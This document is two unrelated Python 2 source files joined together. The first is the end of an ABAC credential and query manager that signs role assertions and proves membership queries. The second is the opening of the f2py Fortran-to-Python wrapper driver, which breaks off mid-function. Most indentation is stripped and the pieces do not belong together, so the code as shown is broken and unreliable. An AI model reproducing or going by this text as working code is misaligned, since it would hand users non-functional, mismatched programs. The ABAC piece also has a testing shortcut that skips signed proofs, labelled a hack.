for raw_assertion in raw_assertions:
(raw_fd, raw_filename) = tempfile.mkstemp()
tempfiles.append(raw_filename)
os.close(raw_fd)
raw_file = open(raw_filename, 'w')
raw_file.write(raw_assertion)
raw_file.close()
file.write('%s=None\n' % raw_filename)
file.close()
return config_filename, tempfiles
# Run a subprocess and grab and return contents of standard output
def grab_output_from_subprocess(args):
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
result = ''
chunk = proc.stdout.read()
while chunk:
result = result + chunk
chunk = proc.stdout.read()
return result
# Run a subprocess and execute and grab results of ABAC query evaluation
def execute_abac_query(query, id_certs, raw_assertions = []):
config_filename, tempfiles = \
create_abac_manager_config_file({}, id_certs, {}, raw_assertions)
# Make the query call, pull result from stdout
chapi_home = os.getenv('CHAPIHOME')
chapi_tools = os.path.join(chapi_home, 'tools')
args = ['python', os.path.join(chapi_tools, 'ABACManager.py'),
'--config=%s' % config_filename,
'--query=%s' % query]
chapi_debug("ABAC", "Exec ABAC Query ARGS = %s" % " ".join(args))
result = grab_output_from_subprocess(args)
result_parts = result.split('\n')
ok = result_parts[0].find('Succeeded') >= 0
proof = "\n".join(result_parts[1:])
# Delete the tempfiles
for tfile in tempfiles:
os.unlink(tfile)
return ok, proof
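# A usage sketch (hypothetical certs and assertions; requires CHAPIHOME to
# point at a tree containing tools/ABACManager.py):
#
#   ok, proof = execute_abac_query('CH.member<-Alice',
#                                  {'CH': ch_cert, 'Alice': alice_cert},
#                                  signed_assertion_xml_list)
#   if ok: print proof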
# Generate an ABAC credential of a given assertion signed by "ME"
# with a set of id_certs (a dictionary of {name : cert})
# Run this as a separate process to avoid memory corruption
def generate_abac_credential(assertion, me_cert, me_key, id_certs):
# Create config file
id_cert_files = {'ME' : me_cert}
id_key_files = {'ME' : me_key}
config_filename, tempfiles = \
create_abac_manager_config_file(id_cert_files, id_certs, id_key_files, [])
# Make the call, pull result from stdout
chapi_home = os.getenv('CHAPIHOME')
chapi_tools = os.path.join(chapi_home, 'tools')
args = ['python', os.path.join(chapi_tools, 'ABACManager.py'),
'--config=%s' % config_filename,
'--credential=%s' % assertion]
cred = grab_output_from_subprocess(args)
# Delete the tempfiles
for tfile in tempfiles:
os.unlink(tfile)
return cred
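# A usage sketch (hypothetical paths and certs): sign the RT0 assertion
# 'ME.member<-Alice' with ME's private key, resolving 'Alice' from id_certs:
#
#   cred_xml = generate_abac_credential('ME.member<-Alice',
#                                       '/path/to/me_cert.pem',
#                                       '/path/to/me_key.pem',
#                                       {'Alice': alice_cert})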
class ABACManager:
# Constants
ten_years = 10*365*24*3600
# Constructor
# Optional arguments:
# certs_by_name : A dictionary of principal_name => cert
# cert_files_by_name : A dictionary of principal_name => cert_filename
# key_files_by_name: A dictionary of principal_name => private_key_filename
# assertions : A list of assertions as ABAC statements (X.Y<-Z e.g.)
# raw_assertions : A list of signed XML versions of ABAC statements
    # assertion_files : A list of files containing signed XML versions of ABAC statements
# options : List of command-line provided optional values
def __init__(self, certs_by_name={}, cert_files_by_name={}, \
key_files_by_name={}, \
assertions=[], raw_assertions=[], assertion_files=[], \
options=None, manage_context=True):
# For turning on/off integration with ABAC (for memory leak testing)
self._manage_context = manage_context
# For verbose debug output
self._verbose = False
# List of all ABAC principals (IDs) by name
self._ids_by_name = {}
# List of all files created from dumping certs or raw assertions
self._created_filenames = []
# The ABAC context object
self._ctxt = ABAC.Context()
# All certs provided as raw cert objects
self._certs = []
# All cert files indexed by principal name
self._cert_files = {}
# All key files indexed by principal name
        self._key_files = {}
# All raw assertions (as ABAC expressions)
self._assertions = []
# All assertion files
self._assertion_files = []
# Process all the cert files
for principal_name in cert_files_by_name.keys():
cert_file = cert_files_by_name[principal_name]
principal = self.register_id(principal_name, cert_file)
# Process all the raw certs
for principal_name in certs_by_name.keys():
cert = certs_by_name[principal_name]
cert_file = self._dump_to_file(cert)
principal = self.register_id(principal_name, cert_file)
# Process the private keys
for principal_name in key_files_by_name.keys():
key_file = key_files_by_name[principal_name]
self.register_key(principal_name, key_file)
# Process all assertions
for assertion in assertions:
self.register_assertion(assertion)
# Process all raw_assertions
for raw_assertion in raw_assertions:
raw_assertion_file = self._dump_to_file(raw_assertion)
# print "Loading raw assertion file " + raw_assertion_file
self.register_assertion_file(raw_assertion_file)
# Process all assertion files
for assertion_file in assertion_files:
self.register_assertion_file(assertion_file)
# Save command-line options
self._options = options
# And process if provided
if self._options:
self.init_from_options()
# *** Hack Testing
self._all_assertions = []
self._all_links = {} # ABAC links : where can I get to from X (All Y st. Y<-X)
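    # A construction sketch (hypothetical file names): register our own
    # cert/key plus one external principal and a single RT0 assertion:
    #
    #   manager = ABACManager(
    #       cert_files_by_name={'ME': 'me_cert.pem', 'Alice': 'alice_cert.pem'},
    #       key_files_by_name={'ME': 'me_key.pem'},
    #       assertions=['ME.member<-Alice'])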
def init_from_options(self):
# If a config file is provided, read it into the ABACManager
if self._options.config:
cp = ConfigParser()
cp.optionxform=str
cp.read(self._options.config)
for name in cp.options('Principals'):
cert_file = cp.get('Principals', name)
self.register_id(name, cert_file)
for name in cp.options('Keys'):
key_file = cp.get('Keys', name)
self.register_key(name, key_file)
if 'Assertions' in cp.sections():
for assertion in cp.options('Assertions'):
self.register_assertion(assertion)
if 'AssertionFiles' in cp.sections():
for assertion_file in cp.options("AssertionFiles"):
self.register_assertion_file(assertion_file)
# Use all the other command-line options to override/augment
        # the values in the ABACManager
# Add new principal ID's / keys
if self._options.id:
            for id_filename in self._options.id:
parts = id_filename.split(':')
id_name = parts[0].strip()
id_cert_file = None
if len(parts) > 1:
id_cert_file = parts[1].strip()
self.register_id(id_name, id_cert_file)
id_key_file = None
if len(parts) > 2:
id_key_file = parts[2].strip()
                    self.register_key(id_name, id_key_file)
# Register assertion files provided by command line
if self._options.assertion_file:
for assertion_file in self._options.assertion_file:
self.register_assertion_file(assertion_file)
# Grab pure ABAC assertions from commandline
if self._options.assertion:
for assertion in self._options.assertion:
self.register_assertion(assertion)
    # # Certs and cert_files are dictionaries of name=> cert/cert_file
# # Assertions are a list of RT0 statements
# # X.Y<-Z
# # X.Y<-Z.W
# # or RT1_lite statements (translated into RT0)
# # X.Y(S)<-Z(T)
# # X.Y(S)<-Z.W(T)
# #
# # Throw an exception if any assertion refers
# #to any object not in a provided cert/file
# def __init__(self, certs = {}, cert_files = {}, key_files = {},
# assertions = [], raw_assertions = [], assertion_files = []):
# self._certs = certs
# self._cert_files = cert_files # Indexed by principal name
# self._key_files = key_files # Indexed by principal name
# self._assertions = assertions
# self._assertion_files = assertion_files
# # dump all the certs into temp cert files and register
# for name in self._certs.keys():
# cert = self._certs[name]
# cert_filename = self._dump_to_file(cert)
# self.register_id(iname, cert_filename)
# # Add all cert_files provided
# for name in self._cert_files.keys():
# cert_filename = self._cert_files[name]
# self.register_id(name, cert_filename)
# # Generate self-signed cert if no cert file provided
# if cert_filename is None:
# id = ABAC.ID(name, self.ten_years)
# else:
# id = ABAC.ID(cert_filename)
# # If there is a key associated with this principal, load it
# if self._key_files.has_key(name):
# key_filename = self._key_files[name]
# if key_filename is not None:
# id.load_privkey(key_filename)
# self.register_id(id, name)
# # Parse and create all the assertions.
# for assertion in assertions:
# self.register_assertion(assertion)
# # Dump all raw_assertions (signed XML documents containing assertions)
# for raw_assertion in raw_assertions:
# raw_assertion_file = self._dump_to_file(raw_assertion)
# # print "Loading raw assertion file " + raw_assertion_file
# self._ctxt.load_attribute_file(raw_assertion_file)
# # Register assertions from files
# for assertion_file in assertion_files:
# # print "Loading assertion file " + assertion_file
# self._ctxt.load_attribute_file(assertion_file)
def run(self):
if self._options.query:
ok, proof = self.query(self._options.query)
if ok:
print "Succeeded"
else:
print "Failed"
print "\n".join(self.pretty_print_proof(proof))
else:
assertion = self.register_assertion(self._options.credential)
self._dump_assertion(assertion, self._options.outfile)
# Traverse tree of ABAC expression finding path leading from 'from_expr' to 'to_expr'
# *** Hack
def find_path(self, from_expr, to_expr):
if from_expr not in self._all_links: return False
if to_expr in self._all_links[from_expr]: return True
for link in self._all_links[from_expr]:
if self.find_path(link, to_expr):
return True
return False
# Does given target have given role?
# I.e. can we prove query statement Q (X.role<-target)
# Return ok, proof
def query(self, query_expression):
# *** Hack ***
# Sorry you gotta parse the expressions and go head-to-tail...
if not self._manage_context:
parts = query_expression.split('<-')
lhs = parts[0]
rhs = parts[1]
response = self.find_path(rhs, lhs)
return response, None
query_expression = str(query_expression) # Avoid unicode
query_expression_parts = query_expression.split("<-")
if len(query_expression_parts) != 2:
raise Exception("Illegal query expression : " + query_expression)
query_lhs = query_expression_parts[0].strip()
query_lhs_parts = query_lhs.split(".")
if len(query_lhs_parts) != 2:
raise Exception("Illegal query expression : " + query_expression)
signer = query_lhs_parts[0].strip()
signer_keyid = self._resolve_principal(signer).keyid()
role_name = query_lhs_parts[1].strip()
role = self._resolve_role(role_name)
query_rhs = query_expression_parts[1].strip()
target_name = query_rhs
target = self._resolve_principal(target_name)
resolved_query_expression = "%s.%s" % (signer_keyid, role)
ok, proof = self._ctxt.query(resolved_query_expression, target.keyid())
return ok, proof
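    # Example (hypothetical principals registered beforehand):
    #
    #   ok, proof = manager.query('CH.member<-Alice')
    #
    # proves whether Alice holds the CH.member role; on success the proof
    # chain can be rendered with pretty_print_proof(proof).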
    # Delete all the tempfiles created
def __del__(self):
del self._ctxt
for created_filename in self._created_filenames:
os.remove(created_filename)
# Register a new ID with the manager, loading into lookup table and context
def register_id(self, name, cert_file):
# *** Hack ***
if not self._manage_context:
return
if cert_file == '' or cert_file == 'None':
cert_file = None
if cert_file:
id = ABAC.ID(cert_file)
else:
id = ABAC.ID(name, self.ten_years)
if self._verbose:
chapi_audit_and_log('ABAC', "Registering ID: " + name + " " + str(cert_file))
if self._ids_by_name.has_key(name):
raise Exception("ABACManager: name doubley defined " + name)
self._ids_by_name[name] = id
self._ctxt.load_id_chunk(id.cert_chunk())
# Load a private key with a principal
def register_key(self, name, key_file):
# *** Hack ***
if not self._manage_context:
return
if key_file and key_file != '' and key_file != 'None':
id = self._ids_by_name[name]
id.load_privkey(key_file)
if self._verbose:
chapi_audit_and_log('ABAC', "Registering key " + name + " " + key_file)
# Register a new assertion with the manager
# Parse the expression and resolve the pieces
# into RT1_line/RT0 roles and principal keyids
# Generate exception if a principal is referenced but not registered
def register_assertion(self, assertion):
if self._verbose:
chapi_audit_and_log('ABAC', "Registering assertion " + assertion)
# *** Hack ***
if not self._manage_context:
self._all_assertions.append(assertion)
parts = assertion.split('<-')
subject_role= parts[0]
principal = parts[1]
if principal not in self._all_links: self._all_links[principal] = []
self._all_links[principal].append(subject_role)
return # *** HACK
assertion = str(assertion) # Avoid unicode
assertion_pieces = assertion.split("<-")
if len(assertion_pieces) != 2:
raise Exception("Ill-formed assertion: need exactly 1 <- : " \
+ assertion)
lhs = assertion_pieces[0].strip()
rhs = assertion_pieces[1].strip()
lhs_pieces = lhs.split('.')
if len(lhs_pieces) != 2:
raise Exception("Ill-formed assertion LHS: need exactly 1 . : " \
+ lhs)
subject = self._resolve_principal(lhs_pieces[0])
role = self._resolve_role(lhs_pieces[1])
P = ABAC.Attribute(subject, role, self.ten_years)
rhs_pieces = rhs.split('.')
if len(rhs_pieces) >= 1:
principal_name = rhs_pieces[0].strip()
object = self._resolve_principal(principal_name)
if len(rhs_pieces) == 1:
P.principal(object.keyid())
elif len(rhs_pieces) == 2:
role_name = rhs_pieces[1].strip()
role = self._resolve_role(role_name)
P.role(object.keyid(), role)
elif len(rhs_pieces) == 3:
# Linking role
role1 = rhs_pieces[1].strip()
role2 = rhs_pieces[2].strip()
linking_role_left = self._resolve_role(role1)
linking_role_right = self._resolve_role(role2)
                P.linking_role(object.keyid(), linking_role_left, linking_role_right)
else:
raise Exception("Ill-formed assertion RHS: need < 2 . : " + rhs)
P.bake()
self._ctxt.load_attribute_chunk(P.cert_chunk())
self._assertions.append(assertion)
return P
def register_assertion_file(self, assertion_file):
if self._verbose:
chapi_audit_and_log('ABAC', "Registering assertion file " + assertion_file)
self._assertion_files.append(assertion_file)
if self._manage_context:
self._ctxt.load_attribute_file(assertion_file)
# return list of user-readable credentials in proof chain
def pretty_print_proof(self, proof):
proof_texts = \
["%s<-%s" % \
(self._transform_string(elt.head().string()), \
self._transform_string(elt.tail().string())) \
for elt in proof]
return proof_texts
# Some internal helper functions
# Dump a cert or credential to a file, returning filename
def _dump_to_file(self, contents):
(fd, filename) = tempfile.mkstemp()
os.close(fd)
file = open(filename, 'w')
file.write(contents)
file.close()
self._created_filenames.append(filename)
return filename
# Dump an assertion to stdout or a file,
# depending on whether outfile_name is set
def _dump_assertion(self, assertion, outfile_name):
outfile = sys.stdout
if outfile_name:
try:
outfile = open(outfile_name, 'w')
except Exception:
print "Can't open outfile " + options.outfile
sys.exit(-1)
assertion.write(outfile)
if outfile_name:
outfile.close()
# Lookup principal by name and return
# Raise exception if not found
def _resolve_principal(self, name):
if self._ids_by_name.has_key(name):
return self._ids_by_name[name]
else:
raise Exception("Unregistered principal: " + name)
# Resolve a role string into RT1_lite syntax
# I.e.
# R => R (where R is a simple non-parenthesized string)
# R(S) => R_S.keyid() where S is the name of principal
def _resolve_role(self, role):
has_lpar = role.find("(")
has_rpar = role.find(")")
        if has_lpar < 0 and has_rpar < 0:
return role
        elif has_lpar >= 0 and has_rpar >= 0 and has_lpar < has_rpar:
role_parts = role.split('(')
role_name = role_parts[0].strip()
object_parts = role_parts[1].split(')')
object_name = object_parts[0].strip()
object = self._resolve_principal(object_name)
return "%s_%s" % (role_name, object.keyid())
else:
raise Exception("Ill-formed role: " + role)
# Replace keyids with string names in string
def _transform_string(self, string):
for id_name in self._ids_by_name.keys():
id = self._ids_by_name[id_name]
id_keyid = id.keyid()
string = string.replace(id_keyid, id_name)
return string
def main(argv=sys.argv):
parser = optparse.OptionParser(description='Produce an ABAC Assertion')
parser.add_option("--assertion",
help="ABAC-style assertion",
action = 'append',
default=[])
parser.add_option("--assertion_file",
help="file containing ABAC assertion",
default = [])
parser.add_option("--id", action='append',
help="Identifier name (self-signed case) or " +
"name:cert_file (externally signed case")
parser.add_option("--credential",
help="Expression of ABAC statement for which to generate signed credential")
parser.add_option("--query", help="Query expression to evaluate")
parser.add_option('--outfile',
help="name of file to put signed XML contents of credential (default=stdout)")
parser.add_option('--config',
help="Name of config file with Principals/Keys/Assertions/AssertionFiles sections",
default = None)
(options, args) = parser.parse_args(argv)
# We need either a query or credential expression
if not options.query and not options.credential:
parser.print_help()
sys.exit(-1)
manager = ABACManager(options=options)
manager._verbose = True
manager.run()
if __name__ == "__main__":
main()
sys.exit(0)
|
|
#!/usr/bin/env python
"""
f2py2e - Fortran to Python C/API generator. 2nd Edition.
See __usage__ below.
Copyright 1999--2005 Pearu Peterson all rights reserved,
Pearu Peterson <pearu@cens.ioc.ee>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/05/06 08:31:19 $
Pearu Peterson
"""
__version__ = "$Revision: 1.90 $"[10:-1]
import __version__
f2py_version = __version__.version
import sys
import os
import pprint
import types
import re
errmess=sys.stderr.write
#outmess=sys.stdout.write
show=pprint.pprint
import crackfortran
import rules
import cb_rules
import auxfuncs
import cfuncs
import f90mod_rules
outmess = auxfuncs.outmess
try:
from numpy import __version__ as numpy_version
except ImportError:
numpy_version = 'N/A'
__usage__ = """\
Usage:
1) To construct extension module sources:
f2py [<options>] <fortran files> [[[only:]||[skip:]] \\
<fortran functions> ] \\
[: <fortran files> ...]
2) To compile fortran files and build extension modules:
f2py -c [<options>, <build_flib options>, <extra options>] <fortran files>
3) To generate signature files:
f2py -h <filename.pyf> ...< same options as in (1) >
Description: This program generates a Python C/API file (<modulename>module.c)
that contains wrappers for given fortran functions so that they
can be called from Python. With the -c option the corresponding
extension modules are built.
Options:
--2d-numpy Use numpy.f2py tool with NumPy support. [DEFAULT]
--2d-numeric Use f2py2e tool with Numeric support.
--2d-numarray Use f2py2e tool with Numarray support.
--g3-numpy Use 3rd generation f2py from the separate f2py package.
[NOT AVAILABLE YET]
-h <filename> Write signatures of the fortran routines to file <filename>
and exit. You can then edit <filename> and use it instead
of <fortran files>. If <filename>==stdout then the
signatures are printed to stdout.
<fortran functions> Names of fortran routines for which Python C/API
functions will be generated. Default is all that are found
in <fortran files>.
<fortran files> Paths to fortran/signature files that will be scanned for
<fortran functions> in order to determine their signatures.
skip: Ignore fortran functions that follow until `:'.
only: Use only fortran functions that follow until `:'.
: Get back to <fortran files> mode.
-m <modulename> Name of the module; f2py generates a Python/C API
file <modulename>module.c or extension module <modulename>.
Default is 'untitled'.
--[no-]lower Do [not] lower the cases in <fortran files>. By default,
--lower is assumed with -h key, and --no-lower without -h key.
--build-dir <dirname> All f2py generated files are created in <dirname>.
Default is tempfile.mktemp().
--overwrite-signature Overwrite existing signature file.
--[no-]latex-doc Create (or not) <modulename>module.tex.
Default is --no-latex-doc.
--short-latex Create 'incomplete' LaTeX document (without commands
\\documentclass, \\tableofcontents, and \\begin{document},
\\end{document}).
--[no-]rest-doc Create (or not) <modulename>module.rst.
Default is --no-rest-doc.
--debug-capi Create C/API code that reports the state of the wrappers
during runtime. Useful for debugging.
--[no-]wrap-functions Create Fortran subroutine wrappers to Fortran 77
functions. --wrap-functions is default because it ensures
maximum portability/compiler independence.
--include_paths <path1>:<path2>:... Search include files from the given
directories.
--help-link [..] List system resources found by system_info.py. See also
--link-<resource> switch below. [..] is optional list
of resources names. E.g. try 'f2py --help-link lapack_opt'.
--quiet Run quietly.
--verbose Run with extra verbosity.
-v Print f2py version ID and exit.
numpy.distutils options (only effective with -c):
--fcompiler= Specify Fortran compiler type by vendor
--compiler= Specify C compiler type (as defined by distutils)
--help-fcompiler List available Fortran compilers and exit
--f77exec= Specify the path to F77 compiler
--f90exec= Specify the path to F90 compiler
--f77flags= Specify F77 compiler flags
--f90flags= Specify F90 compiler flags
--opt= Specify optimization flags
--arch= Specify architecture specific optimization flags
--noopt Compile without optimization
--noarch Compile without arch-dependent optimization
--debug Compile with debugging information
Extra options (only effective with -c):
--link-<resource> Link extension module with <resource> as defined
by numpy.distutils/system_info.py. E.g. to link
with optimized LAPACK libraries (vecLib on MacOSX,
ATLAS elsewhere), use --link-lapack_opt.
See also --help-link switch.
-L/path/to/lib/ -l<libname>
-D<define> -U<name>
-I/path/to/include/
<filename>.o <filename>.so <filename>.a
Using the following macros may be required with non-gcc Fortran
compilers:
-DPREPEND_FORTRAN -DNO_APPEND_FORTRAN -DUPPERCASE_FORTRAN
-DUNDERSCORE_G77
When using -DF2PY_REPORT_ATEXIT, a performance report of F2PY
interface is printed out at exit (platforms: Linux).
When using -DF2PY_REPORT_ON_ARRAY_COPY=<int>, a message is
sent to stderr whenever F2PY interface makes a copy of an
array. Integer <int> sets the threshold for array sizes when
a message should be shown.
Version: %s
numpy Version: %s
Requires: Python 2.3 or higher.
License: NumPy license (see LICENSE.txt in the NumPy source code)
Copyright 1999 - 2005 Pearu Peterson all rights reserved.
http://cens.ioc.ee/projects/f2py2e/"""%(f2py_version, numpy_version)
def scaninputline(inputline):
files,funcs,skipfuncs,onlyfuncs,debug=[],[],[],[],[]
f,f2,f3,f4,f5,f6,f7=1,0,0,0,0,0,0
verbose = 1
dolc=-1
dolatexdoc = 0
dorestdoc = 0
wrapfuncs = 1
buildpath = '.'
include_paths = []
signsfile,modulename=None,None
options = {'buildpath':buildpath}
for l in inputline:
if l=='': pass
elif l=='only:': f=0
elif l=='skip:': f=-1
elif l==':': f=1;f4=0
elif l[:8]=='--debug-': debug.append(l[8:])
elif l=='--lower': dolc=1
elif l=='--build-dir': f6=1
elif l=='--no-lower': dolc=0
elif l=='--quiet': verbose = 0
elif l=='--verbose': verbose += 1
elif l=='--latex-doc': dolatexdoc=1
elif l=='--no-latex-doc': dolatexdoc=0
elif l=='--rest-doc': dorestdoc=1
elif l=='--no-rest-doc': dorestdoc=0
elif l=='--wrap-functions': wrapfuncs=1
elif l=='--no-wrap-functions': wrapfuncs=0
elif l=='--short-latex': options['shortlatex']=1
elif l=='--overwrite-signature': options['h-overwrite']=1
elif l=='-h': f2=1
elif l=='-m': f3=1
elif l[:2]=='-v':
print f2py_version
sys.exit()
elif l=='--show-compilers':
f5=1
elif l[:8]=='-include':
cfuncs.outneeds['userincludes'].append(l[9:-1])
cfuncs.userincludes[l[9:-1]]='#include '+l[8:]
elif l[:15]=='--include_paths':
f7=1
elif l[0]=='-':
errmess('Unknown option %s\n'%`l`)
sys.exit()
elif f2: f2=0;signsfile=l
elif f3: f3=0;modulename=l
elif f6: f6=0;buildpath=l
elif f7: f7=0;include_paths.extend(l.split(os.pathsep))
elif f==1:
try:
open(l).close()
files.append(l)
except IOError,detail:
errmess('IOError: %s. Skipping file "%s".\n'%(str(detail),l))
elif f==-1: skipfuncs.append(l)
elif f==0: onlyfuncs.append(l)
if not f5 and not files and not modulename:
print __usage__
sys.exit()
if not os.path.isdir(buildpath):
if not verbose:
outmess('Creating build directory %s'%(buildpath))
os.mkdir(buildpath)
if signsfile:
signsfile = os.path.join(buildpath,signsfile)
if signsfile and os.path.isfile(signsfile) and 'h-overwrite' not in options:
errmess('Signature file "%s" exists!!! Use --overwrite-signature to overwrite.\n'%(signsfile))
sys.exit()
options['debug']=debug
options['verbose']=verbose
if dolc==-1 and not signsfile: options['do-lower']=0
else: options['do-lower']=dolc
if modulename: options['module']=modulename
if signsfile: options['signsfile']=signsfile
if onlyfuncs: options['onlyfuncs']=onlyfuncs
if skipfuncs: options['skipfuncs']=skipfuncs
options['dolatexdoc'] = dolatexdoc
options['dorestdoc'] = dorestdoc
options['wrapfuncs'] = wrapfuncs
options['buildpath']=buildpath
options['include_paths']=include_paths
return files,options
def callcrackfortran(files,options):
rules.options=options
funcs=[]
crackfortran.debug=options['debug']
crackfortran.verbose=options['verbose']
if 'module' in options:
crackfortran.f77modulename=options['module']
if 'skipfuncs' in options:
crackfortran.skipfuncs=options['skipfuncs']
if 'onlyfuncs' in options:
crackfortran.onlyfuncs=options['onlyfuncs']
crackfortran.include_paths[:]=options['include_paths']
crackfortran.dolowercase=options['do-lower']
postlist=crackfortran.crackfortran(files)
if 'signsfile' in options:
outmess('Saving signatures to file "%s"\n'%(options['signsfile']))
pyf=crackfortran.crack2fortran(postlist)
if options['signsfile'][-6:]=='stdout':
sys.stdout.write(pyf)
else:
f=open(options['signsfile'],'w')
f.write(pyf)
f.close()
return postlist
def buildmodules(lst):
cfuncs.buildcfuncs()
outmess('Building modules...\n')
modules,mnames,isusedby=[],[],{}
for i in range(len(lst)):
if '__user__' in lst[i]['name']:
cb_rules.buildcallbacks(lst[i])
else:
if 'use' in lst[i]:
for u in lst[i]['use'].keys():
if u not in isusedby:
isusedby[u]=[]
isusedby[u].append(lst[i]['name'])
modules.append(lst[i])
mnames.append(lst[i]['name'])
ret = {}
for i in range(len(mnames)):
if mnames[i] in isusedby:
outmess('\tSkipping module "%s" which is used by %s.\n'%(mnames[i],','.join(map(lambda s:'"%s"'%s,isusedby[mnames[i]]))))
else:
um=[]
if 'use' in modules[i]:
for u in modules[i]['use'].keys():
if u in isusedby and u in mnames:
um.append(modules[mnames.index(u)])
else:
                        outmess('\tModule "%s" uses nonexistent "%s" which will be ignored.\n'%(mnames[i],u))
ret[mnames[i]] = {}
dict_append(ret[mnames[i]],rules.buildmodule(modules[i],um))
return ret
def dict_append(d_out,d_in):
for (k,v) in d_in.items():
if k not in d_out:
d_out[k] = []
if type(v) is types.ListType:
d_out[k] = d_out[k] + v
else:
d_out[k].append(v)
def run_main(comline_list):
"""Run f2py as if string.join(comline_list,' ') is used as a command line.
In case of using -h flag, return None.
"""
if sys.version_info[0] >= 3:
import imp
imp.reload(crackfortran)
else:
reload(crackfortran)
f2pydir=os.path.dirname(os.path.abspath(cfuncs.__file__))
fobjhsrc = os.path.join(f2pydir,'src','fortranobject.h')
fobjcsrc = os.path.join(f2pydir,'src','fortranobject.c')
files,options=scaninputline(comline_list)
auxfuncs.options=options
postlist=callcrackfortran(files,options)
isusedby={}
for i in range(len(postlist)):
if 'use' in postlist[i]:
for u in postlist[i]['use'].keys():
if u not in isusedby:
isusedby[u]=[]
isusedby[u].append(postlist[i]['name'])
for i in range(len(postlist)):
if postlist[i]['block']=='python module' and '__user__' in postlist[i]['name']:
if postlist[i]['name'] in isusedby:
#if not quiet:
outmess('Skipping Makefile build for module "%s" which is used by %s\n'%(postlist[i]['name'],','.join(map(lambda s:'"%s"'%s,isusedby[postlist[i]['name']]))))
if 'signsfile' in options:
if options['verbose']>1:
outmess('Stopping. Edit the signature file and then run f2py on the signature file: ')
outmess('%s %s\n'%(os.path.basename(sys.argv[0]),options['signsfile']))
return
for i in range(len(postlist)):
if postlist[i]['block']!='python module':
if 'python module' not in options:
errmess('Tip: If your original code is Fortran source then you must use -m option.\n')
raise TypeError,'All blocks must be python module blocks but got %s'%(`postlist[i]['block']`)
auxfuncs.debugoptions=options['debug']
f90mod_rules.options=options
auxfuncs.wrapfuncs=options['wrapfuncs']
ret=buildmodules(postlist)
for mn in ret.keys():
dict_append(ret[mn],{'csrc':fobjcsrc,'h':fobjhsrc})
return ret
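# A usage sketch (hypothetical file name): generate wrapper sources for one
# Fortran file without compiling, exactly as if run from the command line:
#
#   ret = run_main('-m example example.f'.split())
#
# ret maps each built module name to its generated sources, with
# fortranobject.c/fortranobject.h appended under 'csrc'/'h'.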
def filter_files(prefix,suffix,files,remove_prefix=None):
"""
Filter files by prefix and suffix.
"""
filtered,rest = [],[]
match = re.compile(prefix+r'.*'+suffix+r'\Z').match
if remove_prefix:
ind = len(prefix)
else:
ind = 0
for file in [x.strip() for x in files]:
if match(file): filtered.append(file[ind:])
else: rest.append(file)
return filtered,rest
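# Example: split '-I' include directives out of a mixed argument list,
# stripping the prefix from the matches:
#
#   dirs, rest = filter_files('-I', '', ['-I/usr/include', 'a.f'],
#                             remove_prefix=1)
#   # dirs == ['/usr/include'], rest == ['a.f']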
def get_prefix(module):
p = os.path.dirname(os.path.dirname(module.__file__))
return p
def run_compile():
"""
Do it all in one call!
"""
import tempfile
i = sys.argv.index('-c')
del sys.argv[i]
remove_build_dir = 0
try: i = sys.argv.index('--build-dir')
except ValueError: i=None
if i is not None:
build_dir = sys.argv[i+1]
del sys.argv[i+1]
del sys.argv[i]
else:
remove_build_dir = 1
build_dir = os.path.join(tempfile.mktemp())
sysinfo_flags = filter(re.compile(r'[-][-]link[-]').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=sysinfo_flags:a not in flags,sys.argv)
if sysinfo_flags:
sysinfo_flags = [f[7:] for f in sysinfo_flags]
f2py_flags = filter(re.compile(r'[-][-]((no[-]|)(wrap[-]functions|lower)|debug[-]capi|quiet)|[-]include').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=f2py_flags:a not in flags,sys.argv)
f2py_flags2 = []
fl = 0
for a in sys.argv[1:]:
if a in ['only:','skip:']:
fl = 1
elif a==':':
fl = 0
if fl or a==':':
f2py_flags2.append(a)
if f2py_flags2 and f2py_flags2[-1]!=':':
f2py_flags2.append(':')
f2py_flags.extend(f2py_flags2)
sys.argv = filter(lambda a,flags=f2py_flags2:a not in flags,sys.argv)
flib_flags = filter(re.compile(r'[-][-]((f(90)?compiler([-]exec|)|compiler)=|help[-]compiler)').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=flib_flags:a not in flags,sys.argv)
fc_flags = filter(re.compile(r'[-][-]((f(77|90)(flags|exec)|opt|arch)=|(debug|noopt|noarch|help[-]fcompiler))').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=fc_flags:a not in flags,sys.argv)
if 1:
del_list = []
for s in flib_flags:
v = '--fcompiler='
if s[:len(v)]==v:
from numpy.distutils import fcompiler
fcompiler.load_all_fcompiler_classes()
allowed_keys = fcompiler.fcompiler_class.keys()
nv = ov = s[len(v):].lower()
if ov not in allowed_keys:
vmap = {} # XXX
try:
nv = vmap[ov]
except KeyError:
if ov not in vmap.values():
print 'Unknown vendor: "%s"' % (s[len(v):])
nv = ov
i = flib_flags.index(s)
flib_flags[i] = '--fcompiler=' + nv
continue
for s in del_list:
i = flib_flags.index(s)
del flib_flags[i]
assert len(flib_flags)<=2,`flib_flags`
setup_flags = filter(re.compile(r'[-][-](verbose)').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=setup_flags:a not in flags,sys.argv)
if '--quiet' in f2py_flags:
setup_flags.append('--quiet')
modulename = 'untitled'
sources = sys.argv[1:]
if '-m' in sys.argv:
i = sys.argv.index('-m')
modulename = sys.argv[i+1]
del sys.argv[i+1],sys.argv[i]
sources = sys.argv[1:]
else:
from numpy.distutils.command.build_src import get_f2py_modulename
pyf_files,sources = filter_files('','[.]pyf([.]src|)',sources)
sources = pyf_files + sources
for f in pyf_files:
modulename = get_f2py_modulename(f)
if modulename:
break
extra_objects, sources = filter_files('','[.](o|a|so)',sources)
include_dirs, sources = filter_files('-I','',sources,remove_prefix=1)
library_dirs, sources = filter_files('-L','',sources,remove_prefix=1)
libraries, sources = filter_files('-l','',sources,remove_prefix=1)
undef_macros, sources = filter_files('-U','',sources,remove_prefix=1)
define_macros, sources = filter_files('-D','',sources,remove_prefix=1)
using_numarray = 0
using_numeric = 0
for i in range(len(define_macros)):
name_value = define_macros[i].split('=',1)
if len(name_value)==1:
name_value.append(None)
if len(name_value)==2:
define_macros[i] = tuple(name_value)
else:
print 'Invalid use of -D:',name_value
from numpy.distutils.system_info import get_info
num_include_dir = None
num_info = {}
#import numpy
#n = 'numpy'
#p = get_prefix(numpy)
#from numpy.distutils.misc_util import get_numpy_include_dirs
#num_info = {'include_dirs': get_numpy_include_dirs()}
if num_info:
